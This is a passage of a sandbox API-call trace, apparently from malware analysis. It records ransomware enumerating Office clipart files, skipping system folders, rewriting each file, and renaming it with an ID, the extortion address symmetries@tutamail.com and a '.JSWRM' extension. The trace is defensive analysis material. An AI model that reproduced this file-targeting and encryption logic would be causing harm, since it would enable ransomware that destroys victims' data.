[0092.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0092.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0092.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.909] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00608_.WMF", cAlternateFileName="")) returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2=".") returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="..") returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="...") returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="windows") returned -1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="recovery") returned -1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="perflogs") returned -1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="documents and settings") returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="system volume information") returned -1 [0092.910] lstrcmpiW (lpString1="PE00608_.WMF", lpString2="msocache") returned 1 [0092.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00608_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00608_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00608_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00608_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00608_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00608_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.911] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6440) returned 1 [0092.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1920) returned 0x205850 [0092.911] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1920, lpOverlapped=0x0) returned 1 [0092.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.913] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1920, lpOverlapped=0x0) returned 1 [0092.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.913] CloseHandle (hObject=0x314) returned 1 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0092.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0092.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0092.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0092.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.914] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.915] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4cea, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00633_.WMF", cAlternateFileName="")) returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2=".") returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="..") returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="...") returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="windows") returned -1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="recovery") returned -1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="perflogs") returned -1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="documents and settings") returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="system volume information") returned -1 [0092.915] lstrcmpiW (lpString1="PE00633_.WMF", lpString2="msocache") returned 1 [0092.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00633_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00633_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00633_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0092.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00633_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00633_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00633_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0092.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.916] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19690) returned 1 [0092.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ce0) returned 0x24d210 [0092.916] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ce0, lpOverlapped=0x0) returned 1 [0092.919] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.919] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ce0, lpOverlapped=0x0) returned 1 [0092.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.919] CloseHandle (hObject=0x314) returned 1 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.920] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb12c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00640_.WMF", cAlternateFileName="")) returned 1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2=".") returned 1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="..") returned 1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="...") returned 1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="windows") returned -1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="recovery") returned -1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="perflogs") returned -1 [0092.920] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="documents and settings") returned 1 [0092.921] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.921] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="system volume information") returned -1 [0092.921] lstrcmpiW (lpString1="PE00640_.WMF", lpString2="msocache") returned 1 [0092.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00640_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00640_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00640_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0092.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00640_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00640_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00640_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.921] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45356) returned 1 [0092.921] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb120) returned 0x24d210 [0092.922] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb120, lpOverlapped=0x0) returned 1 [0092.926] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.926] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb120, lpOverlapped=0x0) returned 1 [0092.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.927] CloseHandle (hObject=0x314) returned 1 [0092.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0092.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0092.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 